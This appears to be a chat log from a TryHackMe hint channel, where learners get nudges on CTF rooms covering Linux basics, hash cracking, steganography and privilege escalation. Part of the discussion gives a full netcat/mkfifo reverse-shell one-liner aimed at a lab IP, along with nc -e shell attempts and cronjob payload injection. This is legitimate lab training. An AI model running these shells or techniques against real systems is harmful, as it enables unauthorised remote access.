#room-hints

how do i run the binary in linux as i am doing learn linux room

i stuck @ task 11

how do i run the binary in linux as i am doing learn linux room
i stuck @ task 11

!writeup zthlinux

In that room, I'll just be repeating myself by saying it again 😄

@inland onyx <3

👍

Linux Challenges, Task 4, #7. "locate and retrieve flag 26" and #8 locate and retrieve flag27"

Any nudges to the right place with flag 26? Can't really seem to find it anywhere.

For flag27, Alice can run it via the information found with "sudo -l" but when running either it as "./flag27" or "sudo ./flag27" still getting a permission denied error.

I know thats two hints but I dont like working on more than two problems at a time 🙃

hey,cant get any directories using gobuster in "thecodcaper" task3...what to do?

flag26 you'll need to regex. It's literally tacked onto a filename somewhere on the system

flag27, be careful to choose exactly the right command

sudo rules are very, very particular

@polar crescent, try tacking on some common file extensions to the end

yeah using -x .php,.txt,.html...did that.!..all is here is just some <svg ......>

Try that without the dots

-x php,txt,html

Eejit over here didn't copy down his original command

ok....what are those svg tags that are showing?

use -x "php,txt,html"

Quotes shouldn't be necessary, but I guess that oughtta work

What svg tags?

ah, good to know

@inland onyx /<svg height="32" class="octicon octicon-mark-github text-white" viewBox="0 0 16 16" version="1.1" width="32" aria-hidden="true"><path fill-rule="evenodd" d="Something in here"/></svg> .html This kind of tags are showing..

what exact command line are you using @polar crescent ?

That's coming up in the gobuster output?...

yeah

Can we shift this over to #room-help btw?

gobuster dir -u ip -w wordlist -x "php,txt,html"

ok

@inland onyx looking for flag26, in / directory, running "grep -r "flag26" 2>/dev/null"

on the right track?

Uh

When I say you're looking for the flag tacked onto the end of a file

I mean, literally

A character stream, 32 characters long

Should be a SHA256 hash, from memory. Not that it matters, as you still need to search for it the same way either way

Gotcha...

That question is a pain. Put it that way

okay, well then, I'll focus on 27 for the time being and work on my understanding of the sudo command

👍
Good idea

Dang, sudo -l returns the ability to run both cat and flag27 as commands alice can run but its not letting me do either command. Definitely missing some parameter or agrument

Can you screenshot that?

Because I have a feeling it's going to be cat flag27 or something along those lines

Yeah

That's telling you that you're allowed to use /bin/cat ON /home/flag27

Specifically on that one, specific file

As I said, it's very, very specific

WOW, "/home/flag27" is different than just "flag27"

lmao yup, very very specific indeed

It is indeed

I've used that as a "gotcha" in one or two of my rooms, in a couple of different ways

OKAY, last question of task 4, got to find this dang flag 26 ugh

It's also an important feature in PATH manipulation attacks, so keep that in mind 😛

So regex, attached to the end of a file somewhere, 32 characters. Lets piece this together lmao

I feel like flag26 above all others should have a hint button 😂

Hehe, it's a challenge for a reason. It's just, eh, odd

I would suggest looking at the write-up, truth be told

It's unlikely to be something you've seen before

If you do that, feel free to DM me, I can explain it to you if you don't understand it

Okay, will probably do that lmao. Wanted to get Task 4 done before calling it a night. Ill probably DM you tomorrow if thats cool

Fine by me 👍

Tyvm for all the help 🙂

Np 😄

I need a hint for this one :/

Flag 16 lies within another system mount.

Where can you find drives that are automatically mounted @boreal whale

mount in terminal ?
I'm really cluesless when it comes to this ;/

Say for instance

You plug a USB drive in your computer

Where is it mounted

in the computer folder?

I mean in Linux

im using the command line to complete these challanges

Do you have a Linux host

yes i'm currently in Ubuntu and SSH'ed

Do you have a spare flash drive

Yes

Plug it into your computer

Find where it's mounted

I can see it when I open 'Files'

You should be able to view it's properties

You can also use mount and findmnt

okay, I can see it in findmnt under /media/siradev/GREEN

Mhm

I think my time expired on the host machine and I got disconnect. Now the 'Deploy' button is light grey and is not letting me Deploy another machine ;/ Any idea on how to fix it

ohh, just refreshed it, and worked

hello, im working on cod caper but i seem to hit a wall regarding setting up a netcat reverse shell..
on the .php page i used
/bin/sh | nc 10.9.11.240 1234
and on my attacking kali i used
nc -nvlp 1234
nc seems to connect, but no shell is spawned..?

@rugged lodge that is the second time I've seen someone try that as a payload recently. Where the heck are you getting it from?

Lmao Muri ^

its from the instructions -- they linked us 2 pages where common reverse shell commands can be found

God dammit Pars...

xD oops

kekw

Right, given that thing has no input, I see no reason how it could possibly work. Maybe try another one 😁

ah

hate to be an idiot here but..i've been searching awhile now, and trying
nc 10.9.11.240 1234 -e /bin/bash or /bin/sh but still having no luck..feel like im missing something very basic here 😫 is my syntax wrong here?
nc 10.9.11.240 1234 works tho, so im guessing nc works, it's the input that im struggling with hmm

That depends on the system, but theoretically yes

You could also try -c rather than -e

Failing that, there's a more complicated one that I can guarantee will work.

i've tried -c but still doesnt seem to budge welp

mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.9.11.240 1234 > /tmp/f

Use that one then

freaking linux and it's files

Gotta love a good fifo

what does shell mean

it's a linux word for that text only interface

like the commandprompt/cmd on windows

in comparison on Windows, cmd is a type of shell, powershell is another 🙂 same logic translates to Linx

and while that's true, people use the word for anything that's remotely shell-like :p

^^

so any hints on it?

2 characters

what are the names of the shells on linux? Googling is allowed and encouraged

so i just google stuff

I thought I had to look through the room stuff

Researching is a big part of professional IT in general. In the beginning it's "what is"-stuff, but as you advance, you have to search out more complicated information

okay im struggling

can I please have a hint on what to google

"Default unix shells"

Then, when you understand those

Read the man page for su

Hi, anyone recommend a pw list that is best to use on Joker CTF? I can image Burp will take ages to roll through B64 encoded rockyou for example!

@thick epoch pretty sure I didn't have to b64 encode rockyou

@stuck fractal hmm, it says it needs user:pass base64 encoded, and we are brute forcing with Burp, so i assume for each password in a pw list, i need to b64 encode user:pass to run through Burp?

just wondering if there is a smaller pw list I could be using?

I'll grab my pc and check

thanks, no rush if you're in the middle of something, i'm just hacking away at different options at the mo 🙂

@thick epoch So https://en.wikipedia.org/wiki/Basic_access_authentication

b64 encoding is a part of basic authentication

If you use a tool designed to attack basic authentication cough hydra cough it'll encode for you

ok, I did think about using Hydra, but instructions said to use Burp so thought I'd go along 😄 same end result either way I guess.

burp without pro is slow for brute forcing anyway

what does this red thing mean

yeah that's why I was asking if I maybe should be using a smaller pw list. Now worries, Hydra it is 🙂 thanks!

uhhh

I think I broke my putty machine thing

can anyone help me

100% too vague

What's happening or not happening?

it's for the learn linux room

I did cat or something which made something turn red

and now it's just

gone

soo

noone knows?

this is a #site-support question :)

oh sorry

Hello everybody- I am new and just joined two days ago. I started with the beginner path and am stuck on finding flag 5 using the Linux find command. Can someone give another hint? By the way i am loving the site and the challenge. Well done! Thank you.

https://tryhackme.com/room/thefindcommand this is really good for learning about find

find is bae

thanks.

Hey. I am doing the advent of Cyber Room and im stuck on Task 11 #1.

I dont understand what "data" the answer is looking for.

something interesting you can find

I have looked through the dns data

especially something encoded

downloaded the zip file

cracked it

yes

looked through the txt files

answered #2 and #3

but i cant figure out what they are looking for XD

I also decoded the dns query

there's a 'letter' to Santa from TInny

yep

the answer for q2 is in christamslisttimmy.txt

yeah i know that one

Like i said i answered 2 and 3

also did you extract hidden data from .jpg?

just stuck on 1

aah on 1

Is it the decoded Hex?

look at the UDP stream

cause thats the only thing i can think of

yes hex

some text

and a 4 digit number right

my VM just froze cause of RAM XD

fantastic

ye you find stuff encoded in base64 or hex in udp streams

Modern browsers man

RAM killers

it's pretty wild how much ram they can consume, yes.

I allocated 2GB and it wasnt enough

i upped it to 3

im pretty sure its going to freeze again

i just threw it 4 to stop trouble before it even has a chance

I dont have ram man. If i push it to 4 i risk freezing the host machine.

i got an MD5 hash but hashcat throws me a token length exception
command i used was
hashcat -a 0 -m 400 <hash> /usr/share/wordlists/rockyou.txt --force
im kind of lost as to why that is

put the hash into a txt file

tried that as well

same issue

wait

MD5?

https://hashcat.net/wiki/doku.php?id=example_hashes

right, looks like md5

oh

i took the example with md5 from -h

oh okay

oh thats -m 0 too

always check the example hash page

yeah, this is a dumb mistake, shouldnt have happened

thanks

the thing about making dumb mistakes is that you learn not to make dumb mistakes

ok, i think i need a small pointer as to where i should look
context: advent of cyber, day 23 (task 28)
what i did so far:
||sql injection, worked fabulously, got creds, logged in on website, found xss vulnerability <-- how to exploit this tho to get a shell on the machine? or is xss not the intended thing to find

also looked into phpmyadmin but oddly there are no users apparently||

Analyse the flag 24 compiled C program. Find a command that might reveal human readable strings when looking in the source code.
./flag24
reveals these human readable strings
Nothing to see here!!

but I don't see the answer

am I missing something ;/

i might be missing something since i dont know the context for this but maybe xxd to find "hidden" messages in the binary?

yup, thank you so much
it was very well hidden :D
I kept scrolling through it thinking it's nothing

@tranquil nymph How do you black out text?

||<your text>||

Thank you!

|| || || || || || || || || || || ||

you can even make bar codes

any hint for The find command Room , "
Find all files with write permission for the group "others", regardless of any other permissions, with extension ".sh" (use symbolic format)"

what's the switch/flag to search by group, @north moat?

-g+w

in find??

yes

Yeah @bitter crane

wut

never heard this

A room was made about find specifically

I thought it was -group

Yes

i search -group is also right

Yeah

hm

but my answer not accept i don't know why

well, in either case, you have one part. now you just need to put the other switch on for file name

i use ||find / -type f -perm -g+w "*.sh"||

linux challenge flag32. I'm tring to download flag32.mp3 with scp on my kali vm. After getting connection it asks for password. I dont know it

Maybe start with one thing at a time, @north moat :) How would you find a file that ends in .sh?

@bitter crane i use ||find / -type f -perm -g+w "*.sh"||

I saw

but I'm telling you you might want to start simple and upgrade from there when you know everything works separately

hmm

Any hints on Linux Challenge flag 31, flag is a MySQL database name, Ive tried ||mysql -u root -p hello|| but then it asks for password again, and fails no matter that I put in

yup

you shouldn't write the password in cleartext in the command. just -p is enough

ah F.

ty

yeah.. :D

I can navigate and pillage a sql db using sqlmap, but fumble around when doing it locally lmao

it said for the group "others" and i should use (use symbolic format)

symbolic format mens -g+w now how use others ?

yeah, I'm also a bit blind when doing db stuff from the terminal, @white salmon

have you tested that the command works, @north moat ?

@bitter crane on kali i tested and yes work

Great!

Lets make another command that finds .sh files but ignores anything with groups for now

yes i got it thanks @bitter crane

Great! :D

"Find the user which is apart of the "hacker" group and read flag 36"

well ||hacker1004:bob|| so I am not really sure what it's asking to do with that information

find the flag as you've found other flags countless times before :)

only that group (and root) can access it

Oh wow, I was over thinking that one

"Flag 33 is located where you personal $PATH;s are stored"

So I did ||echo $PATH|| and with that info I cd'd into every directory and looked for a flag, am I in the right mindset for that?

(I only did it on Alice)

Read the description carefully

"where $PATH;s are stored", not "where $PATH;s lead to"

ugh

im hardstuck at the last challenge of advent of cyber

i think i am almost there but ||the reverse shell using CVE-2019-7609|| is not working

Did you downgrade msf?

referring to me?

yesm

im not using msf for this

lol

well then

its supposedly rather easy, at the end of the day its just command injection

"it's supposedly rather easy" sounds like something that belongs on a gravestone

Yeeesh

Hmm

Im doing this Tmux room but my "copy mode" isnt behaving like it should be. I do Ctrl+B then [ and it goes into copy mode. but if I hit g it doesnt go to top, it just let me type a line #.

And if I hit space it doesnt "start selection" it jump to the bottom

I must be doing something wrong

i have the same problem

None of the h, j, k, l are working either

still a really cool program, I might just have to get better at it lmao

Are you using the VM on the website?

My own vm

hmm

do regular ctrl hotkeys work?

ctrl+c, etc

I might need to uninstall and reinstall it. yes normal works, creating a pane, renaming it, splitting it, swapping between panes. All that works

I'll probably just have to play around with it more when I have some free time

alright c:

Hi all, i'm doing https://tryhackme.com/room/commonlinuxprivesc room now
and i'm kinda stucked in a stupid way, can somebody help me?

ask the question instead of asking for help :)

I'm at the point where i should create a payload on my host machine using msfvenom, and as it is they give me the command to do that, so noproblem there

@bitter crane i like a little intro Bread 😄

there is no vm that you can access for that room @bitter crane

fair enough :p Usually people just wait for someone to respond to the request for help. It's maddening :p

So i create the payload, it's a reverse_netcat shell, lhost=myhostmachineip lport=8888

Now i understand that i need to specify the port in order to netcat later

But i don't understand how should i get the payload to the target machine

They say to me: "echo payload > autoscript.sh" (which is the file i'm trying to exploit, because it's a cronjob every five minutes and owned by root)

But where should i send that command? From my host machine? and then nc -lvp 8888?

If i do just that and then sit and listen on port 8888 nothing at all happens. So 'im guessing there's something i didn't quite get.

And i also think that i'm quite right to think it.

hi, I'm supposed to ssh to a machine and port 22 is closed ?!

How did you check that is closed?

nmap -p22 ip -Pn

are you sure it's on port 22?

Did you give the machine time to boot?

3 minutes

now its open

miracles happen

@white salmon and i'm still listening on 8888...

What did i get wrong guys?

You always gotta give it time to boot

ok ,i'll take this into consideration

I don't know, @white salmon :c

@bitter crane Does the command echo payload (what payload??) > autoscript.sh (where is the autoscript location specified??)

Make sense to you?

How could i "paste" the contents of the payload from a shell in my host machine to a file in the target machine with that command?

I won't be able to tell you until I've done that one myself :)

Could you check like very very very very quickly? Just a glimpse, please?

😄

I know you got work to procrastinate a little bit far

.D

what? no work on sunday, silly :p

oh, come on

😄

Hi guys, i'm doing room metasploit. Hack a windows server 2012.

After run a reverse_tcp i get this msg: [*] - Meterpreter session 1 closed. Reason: Died. Tried diferents ports.

Did it happen imediately after establishing the connection, @unique locust ?

takes like 1 min and give that msg

the connection is unstable. This is a known weakness with reverse_tcp

is it ok to use john to crack the hash in codcaper? i HATE hashcat and with my setup i get alot of errors so as long as it wont take all day to crack is john ok to use

you have to migrate the connection into a stable process

You already asked that in the other room, @graceful sun. Don't spam.

You even got an answer

that yeah was not aimed at me, dont worry i wont spam

Alright good

Regardless, don't duplicate. But to answer your question -- yes, you can use any cracker you wish

good to know thanks

for your own learning's sake, I'd recommend sticking to john and hashcat, though -- at least for hash cracking

@bitter crane how can i migrate the connection? switching ports?

You're doing the blue room, right, @unique locust ?

nope:
Metasploit

How to use Metasploit as a beginner to hack a Windows 2012 Server

Could you link the room?

https://tryhackme.com/room/metasploit

Task and question number?

task 3 #5

Looks like they don't talk of migrating until later

In Task 5

but you need to escalate privileges first, which is done in Task 4

cant get to the shell because After run a reverse_tcp i get this msg: [*] - Meterpreter session 1 closed. Reason: Died

You said you had like a minute? That should be enough

Even if you have to do it over several rounds

hello,any chance to get a hint for room BP: Volatility last task 4,question 3, i've uploaded the dumped dll and uploaded to virustotal,and got only Win/malicious_confidence ? i'm stuck for a couple of hours trying to figure out why i'im stuck 🙂

You're looking for the name, yes?

This is a known issue. I just stumpled upon and reported it like an hour ago. I advice coming back to this one a little later. You can @ me for an update tomorrow if you'd like

thank you very much!!!

Spoken to the creator of it @cobalt gate it's being investigated - apologies in the mean whilst! You're not the only one tonight.

:)

Hopefully it hasn't been going on for too long

no problem,glad to know, it wasn't me!!! cheers

somebody here did mrrobot ?

If you have a question you can just ask @white salmon

Someone will answer @white salmon

more hint

about

this one

White coloured font

the second key in the mrrobot ctf

nevermind , got it

Steel Mountain -> task-2 question 2 any hint

It helps if you ask what your issue is

Been trying to close this out -- one question left -- I wonder if it is a bug. Toolbox: Vim - Task 2 - "how do we start entering text into our new Vim document" -- six letters -- have tried as I feel everything.

@prime sand you'll kick yourself over this

It's really simple

You're overthinking it really

You probably do this a lot. You're doing it rn

@stuck fractal I already am -- I can list so many commands to get started editing. 🙂

Not even a command

Ty -- got it

Damn -- I was overthinking

Yep

That question catches a lot of people out

Haha -- good to know because vim is in my blood and I even combed google/help docs -- tried so much. Ok I'll turn my crying to laughter now.

@stuck fractal Tyvm!

1 of 1 target successfully completed, 16 valid passwords found
but none work

help? :/

@white salmon that's normally when you're getting your hydra command wrong

can you come pm @stuck fractal

Locate and retrieve flag 27, which is owned by the root user.
when I use ./flag27 it is saying that I do not have permission to do that.
when I try to sudo ./flag27 I get this message garry is not in the sudoers file. This incident will be reported.
Also there is a hint for this quesiton:
What commands can you run as root? "sudo -l" when I do sudo -l i get this, Sorry, user garry may not run sudo on ip-**-**-**-***.eu-west-1.compute.internal.
I do these commands under garry user because I do not know the root password, do I need to find the root password or something ;/?
I'm confused

@white salmon if you hvae got 16 valid passwords

You have messed up the command

revisit and retry

👍

i know, can i pm you? @dusky vigil

not a chance

I don't accept pms

okay

You can ask here, hence what the channel is for

or more specifically as you clearly want help, head over to #room-help

I don't see the login page anywhere on the website to use http-post-form

that's the problem

So you don't have a login page

then what are you running hydra on 😂

" What about using a tool like hydra to bruteforce? "

😄

Find the page to bruteforce first

you can't brute force air

enumerate, find the page and learn how to use hydra

i can't find page

what room?

do share with the crowd

Basic Pentesting

You skipped a step then

Enumerate the web server using commonly available tools. (If you need to learn use

you mean hiden directory?

you have username?

You're trying to brute force a web form

You have other services on the box to brute force

yea i have username

cough ||ssh|| cough

hf

hi everyone

@white salmon please don't just post in each channel. If you want help, ask the question

Flag 33 is located where your personal $PATH's are stored.
I'm not sure what my personal $PATH is
-linuxctf

||echo $PATH||

||/home/bob/bin:/home/bob/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin||

congrats

now you can look around

look through them?

they are pathways

have a look around

explore

: is where they split right

yeah 🙂

👍

Locate and retrieve flag 26.
any hints?
room/linuxctf

@boreal whale if somebody response, ZzZzZz...

@boreal whale i TINK thear sleaping

thear Time line is totally diferent than Us

@boreal whale find out the format of the "flag" (should be easy as you've seen it like 25 times already) and go wild and crazy and search for any match.

Hello people, I'm doing the Advent of Cyber task 11 and the last exercise is resisting me. I'm supposed to steghide a jpg but I need a passphrase. I tried stegcracking it in vain. Thus the wherabout of this passphrase is, so far eluding me, and I would'nt mind a nudge in the right direction. Thanx

The default for steghide is to ask for a password. Thats the best i can give you without giving out the answer.

Let me have a look @white salmon

I did it recently and i remember getting the hidden message by decrypting it on a website

can i use my kali for the room challanges ?

yes!

that would actually be a really good option

awesome

tthx

thx*

in fact, i am only using my own kali

so you can be sure it is fine

Great deal

@white salmon task 11 or day 11?

@past night task 11

@white salmon task 11 is related to a .pcap file

Yep, found a zip file a picture and some html

so that one, right

need hint for "
Last but not least, which module is used with buffer overflow and ROP attacks?" in RP: Metasploit

in 3 letters

just looking into it now

@strange tapir it's shown when you boot metasploit

@past night haha the answer is in the picture on the top of the questions

thanks

my bad @strange tapir i made assumptions haha

@white salmon I used this website to unveil the hidden message: https://futureboy.us/stegano/decinput.html

yup ^

and you can just follow this, it should give you a hand with it

https://docs.google.com/document/d/17vU134ZfKiiE-DgiynrO0MySo4_VCGCpw2YJV_Kp3Pk/edit

Thanx a lot, I think I found it. And Indeed @celest oasis I should have seen it 🙂 thanx again

To think I went through the entire rockyou.txt...

x)

Hey i need some help with this Task. Can't run the binary 😦

it's from learn linux

for those who did mrrobot ctf , any idea why ssh port is shown with open ports on nmap results even if it's closed ?

@white salmon Did you give the machine time to boot? It's common for ports to appear as closed when the service is starting, then open when the service is ready

I haven't done the mr. robot room, but I should :)

@polar mist there's a task that tells you how to run the binary

@stuck fractal when i try to run it get the message "Segmentation fault (core dumped)"

That's probably because you didn't do the other thing that it asked

You haven't set the environment variable, have you?

No i didn't set it

You know your audience too well, James

I've seen all the common things

Who even is our audience these days lmao

I worked in support for over a year...

At least you didn't ask Fen to ensure the monitor was plugged in

Thanks James. I'm new to Linux and it wasn't mentioned anywhere that i had to set it.

It is in the task

where ?

Maybe the text needs to be 24 point and red? :p

@stuck fractal I read trough it carefully and it doesn't mention anything about setting the env. variable. Even if I set it I still do not get how I am supposed to get the password from user shiba3 ?

From or for?

And it says the binary checks if the env variable exists and the value of it

So you need to set it

When you successfully run the binary, it gives you the password

Thanks James

Hello all, can someone help me with [day 6] of 25daysofchristmas, I'm having troubles to find the TryHackMe.jpg password needed to use steghide

Nevermind I found it 👍

Always give it an extra 5-10mins

You'll probably find it in that time

Indeed 😎

Very true

Is anyone working on the cod caper? I'm not sure how to progress from where I'm at and looking for some guidance. Thanks!

i need some help with agent sudo room ?
i didn't get the hint of the incident idk if looking really well or not i'm stuck in there
and i've finished everything i've only this one to complete the room ?

@mighty thorn what question

Task4 second question what is the incident of the photo called ?

oh

it was released in 1995

there's also a book on amazon about it

okay extra infos

thanks bro for helping out

there's a town in new mexico with the same name

yup

@mighty thorn They were hinting at that place so I deleted that message

i just wanted to delete my one

Too close to a flag

@stuck fractal yea it's okay

anyway, from here you can find it yourself

i'm trying to catch what i'v seen xD

it's a mc D

yea i'll try my best in that thnks a lot for these extra infos

no need to supervise me James >.> i won't spoil the fun

you can check the archive post too

@past night You're good

im doing the eternalblue room right now, the hash seems to be a no-password hash but the task expects some actual input 🤔

Make sure you're cracking the right user

huh, i assume its the user that we were supposed to give the username of just before

it says so as well, but there are two other users. Make sure you aren't cracking them instead

Also people seem to have issues cracking that hash with JTR or Hashcat @tranquil nymph

oh

Ophcrack is kinda nice tbh

But just be aware

Online sites can also pick that hash up

hash indexes, yeah

huh

i got it

but why did they store it as

user:perms:<no password hash>:<actual hash>:::

Want to say that's just Windows

Also I think the hashes were two halves?

i mean, i cracked the 2nd one independently

or do i misunderstand what you mean with two halves here

NT:LM

So

Two parts are needed for netlogon

@stuck fractal i'm chaotic good

LM hashes

But only LM has the actual password iirc?

LM hashes are two halves

7 chars each

Ophcrack's gui shows this quite well

so.. the NT part was the nopassword hash

and the LM part cracked independently happened to give me the full password

🤔

ah ok, so the LM hash already contains both halves

huh.. was it intended to find ||.lnk files for all 3 flags in the "recent" folder?||

ah i forgot about this room, always use to go to #room-help

@green prism This is nudges in the correct direction and help avoiding rabbit holes, less hand holding

nvm,

I don't know what each color means, for ex: white color text, green color text, red-background white color text. Where can I learn what each color text means?
I'm not sure what to google in order to find this info

ls -lah, look at the properties

is this the property? -rwsrwxrwx

It's a property, yes.

👌

The red background there means that the SUID bit is set

green text means that it's executable

White text means that it isn't

can it be said that in general, root suid files should only ever be writable by root

As soon as you write to an SUID file it loses SUID though

So it doesn't hugely matter

oh, i didnt know that

ok ty

This challenge is pretty simple. The binary is checking to see if the environment variable "test1234" exists, and if it's set equal to the current $USER environment variable.

33333333
is this what it is asking for?

room/zthlinux - Task 21

Yes, it is, so please delete the answer 😄

but i'm stuck now, ;/ Im not sure what binary is checking that

the one in your current user's homedir

It'll tell you in the question. Failing that try this:

!writeup zthlinux

That's all my help on Learn Linux, all bundled up into one blog post 😄

For that reason it's not like a regular write-up; if you get stuck on something, feel free to use it to set yourself right

i'm so bad
I was ls in the wrong directory and was thinking why is there shiba1 but not shiba2, so I had to change to shiba2 directory to get the binary ;///

Ah, fair enough

if I get REALLY stuck on some hard question is it consider cheating if I use the blog?

Depends on your outlook.

For this room

I would definitely say no

For challenge rooms, it depends on how you see it. I would recommend using write-ups when you're getting started, definitely

Not at all. The writeups are there to help if you are really struggling. However, as long as you feel you've exhausted all ideas and feel like you justify it yourself 🙂

Succinctly put ^^

👍

@boreal whale Worth remembering, when you su it keeps your current dir

And current permissions too, from memory

Well, in addition to your new permissions

makes sense

but if I were to ssh into the user 'shiba2' it would've put me in his home directory, right?

Nope

You keep your current directory

hold on, if you ssh into a machine then you land in the dir set in paswd, right

sooo, most likely indeed the home directory

Oh, yes, sorry

Forget everything I just said

I thought you were asking about su

😅

Yeah, if you SSH in then you would get dumped into the home directory for the user in question

If you were to SSH in as shiba2 then you would land in their home directory

got it, thanks guys

Guys i really give up it's been 4 hours looking for that idk what really should i do

What task are you on now @mighty thorn

the agent sudo room task 4 second question what is called the incident of the pic ?

i finished everything except this one

the cutie.png?

nope when you gain access to J

you find a pic with it

That pic i have to do a reverse search on it i think

Looking for it now

should i upload it here ?

@mighty thorn Reverse image searching

yea srsly not going to lie idk how to do that

A few sites are good for that

Google Images will let you do it

https://yandex.com/images/

https://tineye.com/

https://images.google.com/

okay so i want to write something over here and idk if i'm allowed to ?

Well you should be able to grab the answer if this is the correct method.

If it's got spoilers, stick it in spoiler tags

@proven bridge i've looked in tinyeye and google image what i all find is this

and idk how to stick these in spoiler tags xD

||<text-goes-here>||

okay thanks

||message||

|| UFO , ROSWELL ||

is this enough

?

- Did you try it?

Submitting the answer ?

- I'd research that specific topic a bit more...

- Also, try submiting the answer.

the answer is on 3 words

Maybe it's the City / State? 

||ROSWELL may be in there but others like UFOi don't think so||

0day

If that is one more formatted code box

woah

Where did that incident specifically happen?

I swear....

can you just like

have a day off

:^)

hah nope!

Where did that incident specicially happen?

@proven bridge || New Mexico, roswell||

Be right back sorry

Yes

Try that in a different order

That's not what the photo of the incident is called

wait what ?

finally i've got it

@proven bridge xD as james said it wasn't the answer xd

but thanks anyway

Oh, I thought it was. Based on American history.

My bad.

Nah it's okay at least you replied

thanks mate

anyone done jack? is ||bruteforcing wordpress login|| the intended way?

need help on learning linux task 7 with flag output "long list" format

!writeup zthlinux

With that room, I'll just be repeating myself here @agile sequoia 🙂
I would suggest giving that a read

It goes into slightly more detail should you need it

@inland onyx thank you

No problem 😄

Any hint with lazy admin ? I got to the part where I have to edit the shell.
I entered my IP and Port but Necat cant seem to find a session 😄

I'm stuck on flag5 in Linux Challenges.
(Use of find command)

Tried to just search for any file named flag5, but without succes

could you link the room?

https://tryhackme.com/room/c#writeups

That's a dead link when I click it :I

https://tryhackme.com/room/linuxctf

Could you show me your find command?

find "/home/garry" -name "flag5" -> No output
If I did find "/" -name "flag5" -> I got a permissions denied, and when trying sudo, I wasn't allowed

Also tried to it maybe was in --help, but it wasn't

If you look very carefully through the permission denied messages you might find something

but you can also make the command ignore the permission denied messages (and other error messages) by putting 2>> /dev/null at the end of the command

Thanks, got it 🙂

👍

in the Common Linux Privesc room it says to find the critical file that had its permissions changed to allow the user to right to it, and it the hint is

"Think about where passwords are stored on Linux"

that file is stored in /etc/shadow right

@visual ginkgo

Where else are passwords stored?

@weary fox

Thanks just figured it out

hello! I have little problem with SUID Shenanigans from "advent of cyber" room. I try too find ssh port but

nmap -sV -p 1000- 10.10.yyy.xxx

doesnt work. I just wait very long, there is no result. I got twice response that i should use -Pd option, becouse nmap might be blocked. Whats going on?

Try nmap -sV -p- -vv IP

its still going slowly, but i see that its going much faster

thank you!

@rapid flower Wait up, you're saying that it's working, but really slowly?

Try

!multivpn

aayyyy, i get it, i had much more connections opened. Now i understand. Thank you

@inland onyx i tried this again, i got instantly this reponse from nmap

Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.55 seconds

You've been at this a while

i run test with -Pn, but i dont really know the meaning

The host may have died

You might also have not reconnected to the vpn?

I got new host

Have you given it time to boot?

and i reconnected after killing all conn instances

Ah, cool

How long as the new host been up?

5 min now

well, i think scan is going well

right now, becouse i have more than 1% of ports after minute for the first time

it should end in few minutes. Thank you very much!

Np 😄

What critical file has had its permissions changed to allow some users to write to it?
What command would you guys use to find this information? I clicked on the hint and it kind of gave it away... ;/
so I'm not sure if there is a command that could help me with this?

No. It just relies on basic Linux knowledge

ok got it

Although something like LinPEAS would pick it up, to be fair

can someone give me a hint on how to get the root flag on jack of all trades?

I mean...

I can 😁

What have you tried?

ok so i tried using a cve that linpeas recommended to me (||CVE-2002-1614||)

but i cant seem to get the exploit to wrok

Wrong CVE 🙂

Actually, wrong approach entirely. That one doesn't need a CVE, it's a lot simpler 😄

It's a nice ez priv esc

I assure you you're overthinking it

is it something to do with the password list?

Not if you've already got user

wait i think i found it

😁

@inland onyx can you point me in the right direction for the root flag? im 100% sure i'm still overthinking it

welp

guess i'll try jack

this will be my first (besides retro) medium attempt, and if it goes anything like retro, im screwed

Nah Jack-of-All-Trades is easy

I'm just dreadful at gauging them

well

It just requires a bunch of different techniques

consider i am doing this for less than 2 weeks

@tardy drum your LinPEAS will have found it

ok, very funny with the ports

😆

btw, do we have a go-to dir list, just like rockyou is the default for passwords on thm

Usually directory-list-2.3-medium.txt

But it's not nearly as absolute as rockyou is for passwords

fair enough

May or may not be upgrading the box now btw...

muirland really is mean

You've not done Cherryblossom then?...

?

So far

This is my LEAST mean box

There'll be another one coming out soon

ugh

It's slightly worse

Willow is Ok

Cherryblossom is mean

The ones I have planned?

They

Are mean

Well thats encouraging

Willow is harder than cherryblossom @inland onyx

Only if you can't maths 😛

Even if you can maths

Because willow requires coding

While cherryblossom can be done with freely available tools

Eh

Fair point

oh

i want a math box

Willow is much harder than cherryblossom

math is good

math and coding is probably easier for me tbh

Hehe, go give me another root on Willow then

another day

now i will try jack ... soon 3am but that doesnt matter

not like i can go to work tomorrow anyway

the ending of willow was pretty mean

That's the spirit @tranquil nymph!

The ENDING?

It was the beginning that was meant to be hard!

@inland onyx your privescs are always harder than your users

Nah

No way 😁

i think the ending was mean

bc i spent time trying to privesc

Now now, no giving it away 😛

oh whoops

Hehe 😄

Sorry, I have to delete spoilers @tardy drum

no problem

Beat you to it 😆

slipped my mind

Always wanted to do that

Nah I deleted it first! @inland onyx

😂😂😂

Don't worry about it @tardy drum -- you gave me the opportunity to delete something

Which makes me happy 😁

There we go!

Sorted 😛

Either way, I got to delete something 🤷‍♂️

Oof

Yeah, you win

I can't do that yet...

😁

woah

i think i got somewhere

Oh?

i can do ||command injection on that hidden index.php with curl now||

Yay!

now if only i could get wget to work

Why do you need wget

im serving a reverse shell i want to execute there to make life easier

Just use nc

i mean, i already have this

Uh, do us a favour and delete that? 😄

uh yes

i spoilered it

Skip the first half of the challenge :p

what?

As in, help other people to skip it 😁

oh

Yeah, um, that's definitely not the intended way

the thing i made?

or what

For the record, you can pull a reverse shell a lot easier than that

its not even a reverse shell yet

this is just a script to make the cmd injection easier

Eh, fair enough

I think you might kick yourself when you realise exactly how little you need that command injection

But 🤷‍♂️

oh no

are you being mean again

Uh....

Let's just say you'll be upgrading to SSH pretty quickly

im getting a baaad feeling

am i doing this correctly

No

Doesn't look like it, no

No square brackets

ok thanks

ugh

im getting the feeling that ||jacks_password_list|| is a red herring

nope

There's a lot of rabbit holes but that isn't one of them ❤️

ah i just realized i made a mistake with xxd

so hope is not lost

It's just made to FEEL like one 😁

It's just made to FEEL like one 😁
@inland onyx if I didn't open everything in view-source I would of thoguht it was one

Hehe -- that was the point 😁

I think I touched on using source to maintain a structure when using rce like that

huh

xxd -r behaving really weird

doing cat on the reconstructed file gives something different from the hexdum

Uh, what did I hex encode in that room?...

i just took the file on my own machine

by dumping it

and reconstructing locally

but something went wrong there

Oh

Try doing it with Base64

Also, why not just copy and paste?..

how would i do that though

are we talking about the same thing

Mhm

is this the ||image||?

What am I doing wrong

@weary fox make it on a machine that has metasploit installed

ok

also it won't work

